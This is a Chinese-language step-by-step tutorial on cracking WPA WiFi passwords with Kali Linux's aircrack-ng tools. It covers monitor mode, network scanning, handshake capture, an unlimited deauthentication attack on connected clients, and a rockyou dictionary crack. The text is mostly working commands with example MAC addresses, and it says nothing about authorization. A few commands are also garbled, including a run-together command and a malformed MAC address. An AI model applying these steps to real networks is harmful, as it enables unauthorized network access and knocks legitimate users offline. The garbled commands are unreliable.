使用Kali Linux暴力破解WiFi密码
准备一张支持监听功能并且可以被Kali识别的无线网卡(网上几十块钱就可以买到)
打开kali虚拟机,插入usb无线网卡,选择连接kali虚拟机
打开终端输入:
iwconfig
查看无线网卡:
airmon-ng
该命令列出了支持监控模式的无线网卡,如果没有任何输出,则表示无线网卡不支持监控模式
记下Interface名称,开启网卡的监听模式:
airmon-ngstart wlan0
如果出现结果如下图,说明还有其他网卡处于监听状态,需要先将其关闭:
airmon-ng check kill
再次开启监听模式,并记下其Interface:
airmon-ng start wlan0
扫描附近的wifi信号:
airodump-ng wlan0mon
找到自己的目标wifi后使用 Ctrl+C 中止
BSSID AP端的mac地址
PWR 信号强度(绝对值越小,信号越强)
Data 对应路由器的在线数据吞吐量,数值越大,数
值上传量越大
CH 对应路由的频道
ESSID 对应路由器的名称
输入命令抓取握手包:
airodump-ng -c -w --bssid
示例:
airodump-ng -c 6 -w ./test --bssid 24:16:6D:211:E0 wlan0mon
这里需要有设备与路由传输数据才可以
保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接:
aireplay-ng - [攻击次数,0为无限攻击] -a -c
示例:
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon
当下图所示位置显示 WPA hankshake 即成功抓到握手包,将两个命令框都输入 Ctrl + C 终止攻击和握手抓包
关闭无线网卡监听模式:
airmon-ng stop wlan0mon
使用字典暴力破解Kali自带有一份无线WiFi密码字典,但是需要先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
爆破:
aircrack-ng -w -b
示例:aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
爆破成功后,如图区域会显示 KEY FOUND!(密码)
破解的原理还是一个一个试,之所以要抓握手包,是因为握手包中含有经过加密的密码,我们将握手包抓下来后,可以在本地跑字典破解,并且每秒钟可以试几万个密码,但是如果没有握手包,我们只能手动输密码,那样是很慢的,即使可以用程序来跑,也不能保证路由器没有设置错误次数,有可能会禁止连接,即使没有设置错误次数,但是每次与路由器交互的过程所需要耗费的时间也大于一秒
|